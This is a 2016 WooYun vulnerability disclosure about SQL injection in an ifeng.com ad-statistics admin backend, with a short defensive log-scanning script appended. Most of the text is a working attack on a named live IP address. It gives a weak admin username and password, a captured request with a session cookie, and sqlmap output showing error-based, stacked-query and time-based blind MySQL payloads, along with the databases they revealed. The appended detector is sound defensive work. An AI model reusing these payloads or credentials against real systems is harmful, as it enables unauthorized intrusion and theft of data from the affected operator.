SQL injection in an ifeng.com (凤凰网) admin backend

2016-05-31 16:20

A scan of the class C range turned up this host:

http://211.151.175.94/

It has a weak password: user admin, password 1qaz2wsx

Data statistics system

There are plenty of injection points in here.

Code area
GET /ad/cps?alertType=inline&pagesize=20&btnsubmit=%25E6%2590%259C%25E7%25B4%25A2&game=0&adid=1*&starttime=20160412&adname=1&endtime=20160412 HTTP/1.1
Host: 211.151.175.94
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Proxy-Connection: keep-alive
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.57 Safari/537.36
Host: 211.151.175.94
Referer: http://211.151.175.94/ad/cps
Cookie: PHPSESSID=9maggi0nc8jcrl6rt6svsibr62
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate, sdch

Proof of vulnerability:

Code area
---
Parameter: #1* (URI)

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://211.151.175.94:80/ad/cps?alertType=inline&pagesize=20&btnsubmit=%E6%90%9C%E7%B4%A2&game=0&adid=1 AND (SELECT 8742 FROM(SELECT COUNT(*),CONCAT(0x7171716b71,(SELECT (ELT(8742=8742,1))),0x7178707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&starttime=20160412&adname=1&endtime=20160412

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: http://211.151.175.94:80/ad/cps?alertType=inline&pagesize=20&btnsubmit=%E6%90%9C%E7%B4%A2&game=0&adid=1;(SELECT * FROM (SELECT(SLEEP(5)))GoJQ)#&starttime=20160412&adname=1&endtime=20160412

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://211.151.175.94:80/ad/cps?alertType=inline&pagesize=20&btnsubmit=%E6%90%9C%E7%B4%A2&game=0&adid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))NWid)&starttime=20160412&adname=1&endtime=20160412
---
back-end DBMS: MySQL >= 5.0.0
available databases [2]:
[*] ifeng_stat
[*] information_schema

Fix:

Ideally put it on the internal network, and a CAPTCHA is a must.
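An added example, not part of the original report: a Python check that scans web access logs for requests to /ad/cps whose numeric parameters carry non-numeric data, and labels the three techniques listed in the sqlmap output above. The list of numeric parameters, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# Parameters of /ad/cps assumed to be plain decimal integers (assumption based
# on the values in the captured request; the application code is not shown).
NUMERIC_PARAMS = {"adid", "game", "pagesize", "starttime", "endtime"}
DIGITS = re.compile(r"[0-9]{1,12}")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')

# Markers for the three techniques in the sqlmap output, checked in this order.
TECHNIQUES = [
    ("stacked queries", re.compile(r";\s*\(?\s*select\b", re.I)),
    ("time-based blind", re.compile(r"\bsleep\s*\(", re.I)),
    ("error-based", re.compile(r"floor\s*\(\s*rand\s*\(|information_schema", re.I)),
]

def findings(log_line):
    """Return [(param, label)] for numeric parameters carrying non-numeric data."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if url.path != "/ad/cps":
        return []
    out = []
    for name, values in parse_qs(url.query).items():  # percent-decodes values
        for value in values:
            if name in NUMERIC_PARAMS and not DIGITS.fullmatch(value):
                label = next((t for t, rx in TECHNIQUES if rx.search(value)),
                             "non-numeric value")
                out.append((name, label))
    return out

def sample_line(adid):
    """Build a constructed combined-format log line (documentation client IP)."""
    return ('192.0.2.44 - - [12/Apr/2016:10:31:07 +0800] "GET /ad/cps?game=0&adid='
            + quote(adid, safe="") + '&starttime=20160412&endtime=20160412 HTTP/1.1" 200 512')

# adid values: one benign, three taken from the sqlmap output above.
SAMPLES = [
    "17",
    "1 AND (SELECT * FROM (SELECT(SLEEP(5)))NWid)",
    "1;(SELECT * FROM (SELECT(SLEEP(5)))GoJQ)#",
    "1 AND (SELECT 8742 FROM(SELECT COUNT(*),CONCAT(0x7171716b71,(SELECT (ELT(8742=8742,1))),"
    "0x7178707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)",
]

if __name__ == "__main__":
    for adid in SAMPLES:
        print(findings(sample_line(adid)) or "clean")
```

The same digits-only rule, applied in the application before the value reaches the query, rejects all three payloads regardless of technique.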

Source: www.wooyun.org/bugs/wooyun-2016-0195329
